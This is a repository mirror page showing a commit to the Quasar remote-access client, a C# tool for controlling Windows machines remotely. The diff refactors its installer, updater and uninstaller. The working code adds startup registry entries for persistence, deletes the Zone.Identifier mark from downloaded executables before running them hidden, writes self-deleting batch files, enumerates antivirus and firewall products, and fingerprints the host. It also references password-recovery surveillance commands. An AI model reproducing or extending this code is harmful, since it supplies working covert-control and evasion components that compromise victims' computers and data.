quasar
/
Quasar
mirror of https://github.com/quasar/Quasar.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Many Client improvements 

- Improved Client Installation, Update and Uninstallation
- Improved Registry Access
- Split SystemCore class
This commit is contained in:
MaxXor 2015-08-24 19:34:38 +02:00
parent f8c72b7c0a
commit fd877a13e5
28 changed files with 962 additions and 804 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
Client/Client.csproj
View File

@ -53,12 +53,23 @@
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Core\Data\ClientData.cs" />
<Compile Include="Core\Data\GeoInformation.cs" />
<Compile Include="Core\Helper\MutexHelper.cs" />
<Compile Include="Core\Helper\WindowsAccountHelper.cs" />
<Compile Include="Core\Helper\FileHelper.cs" />
<Compile Include="Core\Helper\FormatHelper.cs" />
<Compile Include="Core\Helper\HostHelper.cs" />
<Compile Include="Core\Helper\NativeMethodsHelper.cs" />
<Compile Include="Core\Helper\PlatformHelper.cs" />
<Compile Include="Core\Helper\RegistryKeyHelper.cs" />
<Compile Include="Core\Helper\ScreenHelper.cs" />
<Compile Include="Core\Helper\DevicesHelper.cs" />
<Compile Include="Core\Helper\SystemHelper.cs" />
<Compile Include="Core\Installation\ClientInstaller.cs" />
<Compile Include="Core\Installation\ClientUninstaller.cs" />
<Compile Include="Core\Installation\ClientUpdater.cs" />
<Compile Include="Core\Installation\Startup.cs" />
<Compile Include="Core\NetSerializer\CodeGenContext.cs" />
<Compile Include="Core\NetSerializer\Helpers.cs" />
<Compile Include="Core\NetSerializer\ITypeSerializer.cs" />
@ -187,7 +198,6 @@
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyDisconnect.cs" />
<Compile Include="Core\ReverseProxy\ReverseProxyClient.cs" />
<Compile Include="Core\ReverseProxy\ReverseProxyCommandHandler.cs" />
<Compile Include="Core\SystemCore.cs" />
<Compile Include="Core\Packets\ClientPackets\SetStatus.cs" />
<Compile Include="Core\Packets\ClientPackets\GetAuthenticationResponse.cs" />
<Compile Include="Core\Packets\IPacket.cs" />

2
Client/Core/Commands/CommandHandler.cs
View File

@ -4,7 +4,7 @@ using xClient.Core.Utilities;
namespace xClient.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN VARIABLES OR P/INVOKES NECESSARY FOR VARIOUS COMMANDS (if needed). */
/* THIS PARTIAL CLASS SHOULD CONTAIN VARIABLES NECESSARY FOR VARIOUS COMMANDS (if needed). */
public static partial class CommandHandler
{
public static UnsafeStreamCodec StreamCodec;

59
Client/Core/Commands/ConnectionHandler.cs
View File

@ -1,25 +1,32 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
using xClient.Config;
using xClient.Core.Data;
using xClient.Core.Helper;
using xClient.Core.Installation;
using xClient.Core.Networking;
using xClient.Core.Utilities;
namespace xClient.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT MANIPULATE THE CONNECTION. */
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT HANDLE CONNECTION COMMANDS. */
public static partial class CommandHandler
{
public static void HandleGetAuthentication(Packets.ServerPackets.GetAuthentication command, Client client)
{
GeoLocationHelper.Initialize();
new Packets.ClientPackets.GetAuthenticationResponse(Settings.VERSION, SystemCore.OperatingSystem, SystemCore.AccountType,
GeoLocationHelper.GeoInfo.country, GeoLocationHelper.GeoInfo.country_code,
GeoLocationHelper.GeoInfo.region, GeoLocationHelper.GeoInfo.city, GeoLocationHelper.ImageIndex,
SystemCore.GetId(), SystemCore.GetUsername(), SystemCore.GetPcName(), Settings.TAG).Execute(client);
new Packets.ClientPackets.GetAuthenticationResponse(Settings.VERSION, PlatformHelper.FullName, WindowsAccountHelper.GetAccountType(),
GeoLocationHelper.GeoInfo.country, GeoLocationHelper.GeoInfo.country_code,
GeoLocationHelper.GeoInfo.region, GeoLocationHelper.GeoInfo.city, GeoLocationHelper.ImageIndex,
DevicesHelper.HardwareId, WindowsAccountHelper.GetName(), SystemHelper.GetPcName(), Settings.TAG).Execute(client);
if (ClientData.AddToStartupFailed)
{
Thread.Sleep(2000);
new Packets.ClientPackets.SetStatus("Adding to startup failed.").Execute(client);
}
}
public static void HandleDoClientUpdate(Packets.ServerPackets.DoClientUpdate command, Client client)
@ -47,7 +54,7 @@ namespace xClient.Core.Commands
{
new Packets.ClientPackets.SetStatus("Updating...").Execute(client);
SystemCore.UpdateClient(client, filePath);
ClientUpdater.Update(client, filePath);
}
}
catch (Exception ex)
@ -82,7 +89,7 @@ namespace xClient.Core.Commands
new Packets.ClientPackets.SetStatus("Updating...").Execute(client);
SystemCore.UpdateClient(client, tempFile);
ClientUpdater.Update(client, tempFile);
}).Start();
}
@ -90,41 +97,7 @@ namespace xClient.Core.Commands
{
new Packets.ClientPackets.SetStatus("Uninstalling... bye ;(").Execute(client);
SystemCore.RemoveTraces();
try
{
string filename = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
FileHelper.GetRandomFilename(12, ".bat"));
string uninstallBatch = (Settings.INSTALL && Settings.HIDEFILE)
? "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del /A:H " + "\"" + SystemCore.MyPath + "\"" + "\n" +
"del " + "\"" + filename + "\""
: "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del " + "\"" + SystemCore.MyPath + "\"" + "\n" +
"del " + "\"" + filename + "\""
;
File.WriteAllText(filename, uninstallBatch);
ProcessStartInfo startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = true,
FileName = filename
};
Process.Start(startInfo);
}
finally
{
SystemCore.Disconnect = true;
client.Disconnect();
}
ClientUninstaller.Uninstall(client);
}
}
}

4
Client/Core/Commands/MiscHandler.cs
View File

@ -41,7 +41,7 @@ namespace xClient.Core.Commands
try
{
NativeMethods.DeleteFile(tempFile + ":Zone.Identifier");
FileHelper.DeleteZoneIdentifier(tempFile);
var bytes = File.ReadAllBytes(tempFile);
if (bytes[0] != 'M' && bytes[1] != 'Z')
@ -89,7 +89,7 @@ namespace xClient.Core.Commands
if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
{
NativeMethods.DeleteFile(filePath + ":Zone.Identifier");
FileHelper.DeleteZoneIdentifier(filePath);
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)

2
Client/Core/Commands/SurveillanceHandler.cs
View File

@ -15,7 +15,7 @@ using xClient.Core.Recovery.FtpClients;
namespace xClient.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT ARE USED FOR SURVEILLANCE. */
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT HANDLE SURVEILLANCE COMMANDS. */
public static partial class CommandHandler
{
public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client)

137
Client/Core/Commands/SystemHandler.cs
View File

@ -178,69 +178,51 @@ namespace xClient.Core.Commands
switch (command.Type)
{
case 0:
using (var key = Registry.LocalMachine.OpenWritableSubKeySafe("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
if (!RegistryKeyHelper.AddRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name, command.Path, true))
{
if (key == null) throw new ArgumentException("Registry key does not exist");
if (!command.Path.StartsWith("\"") && !command.Path.EndsWith("\""))
command.Path = "\"" + command.Path + "\"";
key.SetValue(command.Name, command.Path);
key.Close();
throw new Exception("Could not add value");
}
break;
case 1:
using (var key = Registry.LocalMachine.OpenWritableSubKeySafe("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
if (!RegistryKeyHelper.AddRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name, command.Path, true))
{
if (key == null) throw new ArgumentException("Registry key does not exist");
if (!command.Path.StartsWith("\"") && !command.Path.EndsWith("\""))
command.Path = "\"" + command.Path + "\"";
key.SetValue(command.Name, command.Path);
key.Close();
throw new Exception("Could not add value");
}
break;
case 2:
using (var key = Registry.CurrentUser.OpenWritableSubKeySafe("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
if (!RegistryKeyHelper.AddRegistryKeyValue(Registry.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name, command.Path, true))
{
if (key == null) throw new ArgumentException("Registry key does not exist");
if (!command.Path.StartsWith("\"") && !command.Path.EndsWith("\""))
command.Path = "\"" + command.Path + "\"";
key.SetValue(command.Name, command.Path);
key.Close();
throw new Exception("Could not add value");
}
break;
case 3:
using (var key = Registry.CurrentUser.OpenWritableSubKeySafe("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
if (!RegistryKeyHelper.AddRegistryKeyValue(Registry.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name, command.Path, true))
{
if (key == null) throw new ArgumentException("Registry key does not exist");
if (!command.Path.StartsWith("\"") && !command.Path.EndsWith("\""))
command.Path = "\"" + command.Path + "\"";
key.SetValue(command.Name, command.Path);
key.Close();
throw new Exception("Could not add value");
}
break;
case 4:
if (PlatformHelper.Architecture != 64)
throw new NotSupportedException("Only on 64-bit systems supported");
using (var key = Registry.LocalMachine.OpenWritableSubKeySafe("SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"))
if (!RegistryKeyHelper.AddRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name, command.Path, true))
{
if (key == null) throw new ArgumentException("Registry key does not exist");
if (!command.Path.StartsWith("\"") && !command.Path.EndsWith("\""))
command.Path = "\"" + command.Path + "\"";
key.SetValue(command.Name, command.Path);
key.Close();
throw new Exception("Could not add value");
}
break;
case 5:
if (PlatformHelper.Architecture != 64)
throw new NotSupportedException("Only on 64-bit systems supported");
using (var key = Registry.LocalMachine.OpenWritableSubKeySafe("SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
if (!RegistryKeyHelper.AddRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name, command.Path, true))
{
if (key == null) throw new ArgumentException("Registry key does not exist");
if (!command.Path.StartsWith("\"") && !command.Path.EndsWith("\""))
command.Path = "\"" + command.Path + "\"";
key.SetValue(command.Name, command.Path);
key.Close();
throw new Exception("Could not add value");
}
break;
case 6:
@ -276,81 +258,60 @@ namespace xClient.Core.Commands
switch (command.Type)
{
case 0:
using (
var key =
Registry.LocalMachine.OpenWritableSubKeySafe("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
if (!RegistryKeyHelper.DeleteRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
if (key == null) throw new Exception("Registry key does not exist");
key.DeleteValue(command.Name, true);
key.Close();
throw new Exception("Could not remove value");
}
break;
case 1:
using (
var key =
Registry.LocalMachine.OpenWritableSubKeySafe("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
if (!RegistryKeyHelper.DeleteRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
if (key == null) throw new Exception("Registry key does not exist");
key.DeleteValue(command.Name, true);
key.Close();
throw new Exception("Could not remove value");
}
break;
case 2:
using (
var key =
Registry.CurrentUser.OpenWritableSubKeySafe("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
if (!RegistryKeyHelper.DeleteRegistryKeyValue(Registry.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
if (key == null) throw new Exception("Registry key does not exist");
key.DeleteValue(command.Name, true);
key.Close();
throw new Exception("Could not remove value");
}
break;
case 3:
using (
var key =
Registry.CurrentUser.OpenWritableSubKeySafe(
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
if (!RegistryKeyHelper.DeleteRegistryKeyValue(Registry.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
if (key == null) throw new Exception("Registry key does not exist");
key.DeleteValue(command.Name, true);
key.Close();
throw new Exception("Could not remove value");
}
break;
case 4:
if (PlatformHelper.Architecture != 64)
throw new NotSupportedException("Only on 64-bit systems supported");
using (
var key =
Registry.LocalMachine.OpenWritableSubKeySafe(
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"))
if (!RegistryKeyHelper.DeleteRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
if (key == null) throw new Exception("Registry key does not exist");
key.DeleteValue(command.Name, true);
key.Close();
throw new Exception("Could not remove value");
}
break;
case 5:
if (PlatformHelper.Architecture != 64)
throw new NotSupportedException("Only on 64-bit systems supported");
using (
var key =
Registry.LocalMachine.OpenWritableSubKeySafe(
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
if (!RegistryKeyHelper.DeleteRegistryKeyValue(Registry.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
if (key == null) throw new Exception("Registry key does not exist");
key.DeleteValue(command.Name, true);
key.Close();
throw new Exception("Could not remove value");
}
break;
case 6:
string lnkPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), command.Name);
string startupItemPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), command.Name);
if (!File.Exists(lnkPath))
if (!File.Exists(startupItemPath))
throw new IOException("File does not exist");
File.Delete(lnkPath);
File.Delete(startupItemPath);
break;
}
}
@ -367,27 +328,27 @@ namespace xClient.Core.Commands
string[] infoCollection = new string[]
{
"Processor (CPU)",
SystemCore.GetCpu(),
DevicesHelper.GetCpuName(),
"Memory (RAM)",
string.Format("{0} MB", SystemCore.GetRam()),
string.Format("{0} MB", DevicesHelper.GetTotalRamAmount()),
"Video Card (GPU)",
SystemCore.GetGpu(),
DevicesHelper.GetGpuName(),
"Username",
SystemCore.GetUsername(),
WindowsAccountHelper.GetName(),
"PC Name",
SystemCore.GetPcName(),
SystemHelper.GetPcName(),
"Uptime",
SystemCore.GetUptime(),
SystemHelper.GetUptime(),
"MAC Address",
SystemCore.GetMacAddress(),
DevicesHelper.GetMacAddress(),
"LAN IP Address",
SystemCore.GetLanIp(),
DevicesHelper.GetLanIp(),
"WAN IP Address",
GeoLocationHelper.GeoInfo.ip,
"Antivirus",
SystemCore.GetAntivirus(),
SystemHelper.GetAntivirus(),
"Firewall",
SystemCore.GetFirewall()
SystemHelper.GetFirewall()
};
new Packets.ClientPackets.GetSystemInfoResponse(infoCollection).Execute(client);

17
Client/Core/Data/ClientData.cs Normal file
View File

@ -0,0 +1,17 @@
using System.Windows.Forms;
namespace xClient.Core.Data
{
public static class ClientData
{
public static bool Disconnect { get; set; } // when Disconnect is true, stop all running threads
public static string CurrentPath { get; set; }
public static string InstallPath { get; set; }
public static bool AddToStartupFailed { get; set; }
static ClientData()
{
CurrentPath = Application.ExecutablePath;
}
}
}

59
Client/Core/Data/GeoInformation.cs Normal file
View File

@ -0,0 +1,59 @@
using System.Runtime.Serialization;
namespace xClient.Core.Data
{
[DataContract]
public class GeoInformation
{
[DataMember]
public double longitude { get; set; }
[DataMember]
public double latitude { get; set; }
[DataMember]
public string asn { get; set; }
[DataMember]
public string offset { get; set; }
[DataMember]
public string ip { get; set; }
[DataMember]
public string area_code { get; set; }
[DataMember]
public string continent_code { get; set; }
[DataMember]
public string dma_code { get; set; }
[DataMember]
public string city { get; set; }
[DataMember]
public string timezone { get; set; }
[DataMember]
public string region { get; set; }
[DataMember]
public string country_code { get; set; }
[DataMember]
public string isp { get; set; }
[DataMember]
public string postal_code { get; set; }
[DataMember]
public string country { get; set; }
[DataMember]
public string country_code3 { get; set; }
[DataMember]
public string region_code { get; set; }
}
}

189
Client/Core/Helper/DevicesHelper.cs Normal file
View File

@ -0,0 +1,189 @@
using System;
using System.Management;
using System.Net.NetworkInformation;
using System.Net.Sockets;
using xClient.Core.Encryption;
namespace xClient.Core.Helper
{
public static class DevicesHelper
{
public static string HardwareId { get; private set; }
static DevicesHelper()
{
HardwareId = SHA256.ComputeHash(GetCpuName() + GetMainboardIdentifier() + GetBiosIdentifier());
}
public static string GetBiosIdentifier()
{
try
{
string biosIdentifier = string.Empty;
string query = "SELECT * FROM Win32_BIOS";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
{
foreach (ManagementObject mObject in searcher.Get())
{
biosIdentifier = mObject["Manufacturer"].ToString();
break;
}
}
return (!string.IsNullOrEmpty(biosIdentifier)) ? biosIdentifier : "N/A";
}
catch
{
}
return "Unknown";
}
public static string GetMainboardIdentifier()
{
try
{
string mainboardIdentifier = string.Empty;
string query = "SELECT * FROM Win32_BaseBoard";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
{
foreach (ManagementObject mObject in searcher.Get())
{
mainboardIdentifier = mObject["Manufacturer"].ToString() + mObject["SerialNumber"].ToString();
break;
}
}
return (!string.IsNullOrEmpty(mainboardIdentifier)) ? mainboardIdentifier : "N/A";
}
catch
{
}
return "Unknown";
}
public static string GetCpuName()
{
try
{
string cpuName = string.Empty;
string query = "SELECT * FROM Win32_Processor";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
{
foreach (ManagementObject mObject in searcher.Get())
{
cpuName = mObject["Name"].ToString() + "; ";
}
}
cpuName = FormatHelper.RemoveEnd(cpuName);
return (!string.IsNullOrEmpty(cpuName)) ? cpuName : "N/A";
}
catch
{
}
return "Unknown";
}
public static int GetTotalRamAmount()
{
try
{
int installedRAM = 0;
string query = "Select * From Win32_ComputerSystem";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
{
foreach (ManagementObject mObject in searcher.Get())
{
double bytes = (Convert.ToDouble(mObject["TotalPhysicalMemory"]));
installedRAM = (int)(bytes / 1048576);
}
}
return installedRAM;
}
catch
{
return -1;
}
}
public static string GetGpuName()
{
try
{
string gpuName = string.Empty;
string query = "SELECT * FROM Win32_DisplayConfiguration";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
{
foreach (ManagementObject mObject in searcher.Get())
{
gpuName = mObject["Description"].ToString() + "; ";
}
}
gpuName = FormatHelper.RemoveEnd(gpuName);
return (!string.IsNullOrEmpty(gpuName)) ? gpuName : "N/A";
}
catch
{
return "Unknown";
}
}
public static string GetLanIp()
{
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
ni.OperationalStatus == OperationalStatus.Up)
{
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
continue;
return ip.Address.ToString();
}
}
}
return "-";
}
public static string GetMacAddress()
{
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
ni.OperationalStatus == OperationalStatus.Up)
{
bool foundCorrect = false;
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
continue;
foundCorrect = (ip.Address.ToString() == GetLanIp());
}
if (foundCorrect)
return FormatHelper.FormatMacAddress(ni.GetPhysicalAddress().ToString());
}
}
return "-";
}
}
}

70
Client/Core/Helper/FileHelper.cs
View File

@ -1,5 +1,8 @@
using System;
using System.IO;
using System.Text;
using xClient.Core.Data;
using xClient.Core.Utilities;
namespace xClient.Core.Helper
{
@ -22,5 +25,72 @@ namespace xClient.Core.Helper
if (block.Length < 2) return false;
return (block[0] == 'M' && block[1] == 'Z') || (block[0] == 'Z' && block[1] == 'M');
}
public static void DeleteZoneIdentifier(string filePath)
{
NativeMethods.DeleteFile(filePath + ":Zone.Identifier");
}
public static string CreateUninstallBatch(bool isFileHidden)
{
try
{
string batchFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
GetRandomFilename(12, ".bat"));
string uninstallBatch = (isFileHidden)
? "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del /A:H " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"del " + "\"" + batchFile + "\""
: "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"del " + "\"" + batchFile + "\""
;
File.WriteAllText(batchFile, uninstallBatch);
return batchFile;
}
catch (Exception)
{
return string.Empty;
}
}
public static string CreateUpdateBatch(string newFilePath, bool isFileHidden)
{
try
{
string batchFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
GetRandomFilename(12, ".bat"));
string uninstallBatch = (isFileHidden)
? "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del /A:H " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"move " + "\"" + newFilePath + "\"" + " " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"start \"\" " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"del " + "\"" + batchFile + "\""
: "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"move " + "\"" + newFilePath + "\"" + " " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"start \"\" " + "\"" + ClientData.CurrentPath + "\"" + "\n" +
"del " + "\"" + batchFile + "\""
;
File.WriteAllText(batchFile, uninstallBatch);
return batchFile;
}
catch (Exception)
{
return string.Empty;
}
}
}
}

57
Client/Core/Helper/GeoLocationHelper.cs
View File

@ -1,10 +1,10 @@
using System;
using System.IO;
using System.Net;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Json;
using System.Text;
using System.Xml;
using xClient.Core.Data;
namespace xClient.Core.Helper
{
@ -204,59 +204,4 @@ namespace xClient.Core.Helper
GeoInfo.ip = wanIp;
}
}
[DataContract]
public class GeoInformation
{
[DataMember]
public double longitude { get; set; }
[DataMember]
public double latitude { get; set; }
[DataMember]
public string asn { get; set; }
[DataMember]
public string offset { get; set; }
[DataMember]
public string ip { get; set; }
[DataMember]
public string area_code { get; set; }
[DataMember]
public string continent_code { get; set; }
[DataMember]
public string dma_code { get; set; }
[DataMember]
public string city { get; set; }
[DataMember]
public string timezone { get; set; }
[DataMember]
public string region { get; set; }
[DataMember]
public string country_code { get; set; }
[DataMember]
public string isp { get; set; }
[DataMember]
public string postal_code { get; set; }
[DataMember]
public string country { get; set; }
[DataMember]
public string country_code3 { get; set; }
[DataMember]
public string region_code { get; set; }
}
}

22
Client/Core/Helper/MutexHelper.cs Normal file
View File

@ -0,0 +1,22 @@
using System.Threading;
namespace xClient.Core.Helper
{
public static class MutexHelper
{
private static Mutex _appMutex;
public static bool CreateMutex(string name)
{
bool createdNew;
_appMutex = new Mutex(false, name, out createdNew);
return createdNew;
}
public static void CloseMutex()
{
if (_appMutex != null)
_appMutex.Close();
}
}
}

15
Client/Core/Helper/NativeMethodsHelper.cs
View File

@ -1,4 +1,6 @@
using System.Drawing;
using System;
using System.Drawing;
using System.Runtime.InteropServices;
using xClient.Core.Utilities;
namespace xClient.Core.Helper
@ -13,6 +15,17 @@ namespace xClient.Core.Helper
private const uint KEYEVENTF_KEYDOWN = 0x0000;
private const uint KEYEVENTF_KEYUP = 0x0002;
public static uint GetLastInputInfoTickCount()
{
NativeMethods.LASTINPUTINFO lastInputInfo = new NativeMethods.LASTINPUTINFO();
lastInputInfo.cbSize = (uint)Marshal.SizeOf(lastInputInfo);
lastInputInfo.dwTime = 0;
if (NativeMethods.GetLastInputInfo(ref lastInputInfo))
return lastInputInfo.dwTime;
return 0;
}
public static void DoMouseLeftClick(Point p, bool isMouseDown)
{
NativeMethods.mouse_event(isMouseDown ? MOUSEEVENTF_LEFTDOWN : MOUSEEVENTF_LEFTUP, p.X, p.Y, 0, 0);

23
Client/Core/Helper/PlatformHelper.cs
View File

@ -38,12 +38,10 @@ namespace xClient.Core.Helper
}
/// <summary>
/// The function determines whether the current operating system is a
/// 64-bit operating system.
/// The function determines whether the current operating system is a 64-bit operating system.
/// </summary>
/// <returns>
/// The function returns true if the operating system is 64-bit;
/// otherwise, it returns false.
/// The function returns true if the operating system is 64-bit; otherwise, it returns false.
/// </returns>
static bool Is64BitOperatingSystem()
{
@ -62,14 +60,13 @@ namespace xClient.Core.Helper
}
/// <summary>
/// The function determins whether a method exists in the export
/// table of a certain module.
/// The function determines whether a method exists in the export table of a certain module.
/// </summary>
/// <param name="moduleName">The name of the module</param>
/// <param name="methodName">The name of the method</param>
/// <returns>
/// The function returns true if the method specified by methodName
/// exists in the export table of the module specified by moduleName.
/// The function returns true if the method specified by methodName exists in the export table
/// of the module specified by moduleName.
/// </returns>
static bool DoesWin32MethodExist(string moduleName, string methodName)
{
@ -81,14 +78,22 @@ namespace xClient.Core.Helper
return (NativeMethods.GetProcAddress(moduleHandle, methodName) != IntPtr.Zero);
}
/// <summary>
/// Gets the full name of the operating system running on this computer (including the edition and architecture).
/// </summary>
public static string FullName { get { return string.Format("{0} {1} Bit", Name, Architecture); } }
/// <summary>
/// Gets the name of the operating system running on this computer (including the edition).
/// </summary>
public static string Name { get; private set; }
/// <summary>
/// Determines whether the operating system is 32 or 64-bit.
/// Determines whether the Operating System is 32 or 64-bit.
/// </summary>
/// <value>
/// <c>32</c> if the Operating System is 32-bit, otherwise <c>64</c> for 64-bit.
/// </value>
public static int Architecture { get; private set; }
/// <summary>

61
Client/Core/Helper/RegistryKeyHelper.cs Normal file
View File

@ -0,0 +1,61 @@
using System;
using Microsoft.Win32;
using xClient.Core.Extensions;
namespace xClient.Core.Helper
{
public static class RegistryKeyHelper
{
/// <summary>
/// Adds a value to the registry key.
/// </summary>
/// <param name="baseKey">The base key.</param>
/// <param name="path">The path to the registry key.</param>
/// <param name="name">The name of the value.</param>
/// <param name="value">The value.</param>
/// <param name="addQuotes">If set to True, adds quotes to the value.</param>
/// <returns>True on success, else False.</returns>
public static bool AddRegistryKeyValue(RegistryKey baseKey, string path, string name, string value, bool addQuotes = false)
{
try
{
if (addQuotes && !value.StartsWith("\"") && !value.EndsWith("\""))
value = "\"" + value + "\"";
using (RegistryKey key = baseKey.OpenWritableSubKeySafe(path))
{
if (key == null) return false;
key.SetValue(name, value);
return true;
}
}
catch (Exception)
{
return false;
}
}
/// <summary>
/// Deletes the specified value from the registry key.
/// </summary>
/// <param name="baseKey">THe base key.</param>
/// <param name="path">The path to the registry key.</param>
/// <param name="name">The name of the value to delete.</param>
/// <returns>True on success, else False.</returns>
public static bool DeleteRegistryKeyValue(RegistryKey baseKey, string path, string name)
{
try
{
using (RegistryKey key = baseKey.OpenWritableSubKeySafe(path))
{
if (key == null) return false;
key.DeleteValue(name, true);
return true;
}
}
catch (Exception)
{
return false;
}
}
}
}

74
Client/Core/Helper/SystemHelper.cs Normal file
View File

@ -0,0 +1,74 @@
using System;
using System.Diagnostics;
using System.Management;
namespace xClient.Core.Helper
{
public static class SystemHelper
{
public static string GetUptime()
{
long ticks = Stopwatch.GetTimestamp();
double uptime = ((double)ticks) / Stopwatch.Frequency;
var uptimeSpan = TimeSpan.FromSeconds(uptime);
return string.Format("{0}d : {1}h : {2}m : {3}s", uptimeSpan.Days, uptimeSpan.Hours, uptimeSpan.Minutes, uptimeSpan.Seconds);
}
public static string GetPcName()
{
return Environment.MachineName;
}
public static string GetAntivirus()
{
try
{
string antivirusName = string.Empty;
// starting with Windows Vista we must use the root\SecurityCenter2 namespace
string scope = (PlatformHelper.VistaOrHigher) ? "root\\SecurityCenter2" : "root\\SecurityCenter";
string query = "SELECT * FROM AntivirusProduct";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
{
foreach (ManagementObject mObject in searcher.Get())
{
antivirusName = mObject["displayName"].ToString() + "; ";
}
}
antivirusName = FormatHelper.RemoveEnd(antivirusName);
return (!string.IsNullOrEmpty(antivirusName)) ? antivirusName : "N/A";
}
catch
{
return "Unknown";
}
}
public static string GetFirewall()
{
try
{
string firewallName = string.Empty;
// starting with Windows Vista we must use the root\SecurityCenter2 namespace
string scope = (PlatformHelper.VistaOrHigher) ? "root\\SecurityCenter2" : "root\\SecurityCenter";
string query = "SELECT * FROM FirewallProduct";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
{
foreach (ManagementObject mObject in searcher.Get())
{
firewallName = mObject["displayName"].ToString() + "; ";
}
}
firewallName = FormatHelper.RemoveEnd(firewallName);
return (!string.IsNullOrEmpty(firewallName)) ? firewallName : "N/A";
}
catch
{
return "Unknown";
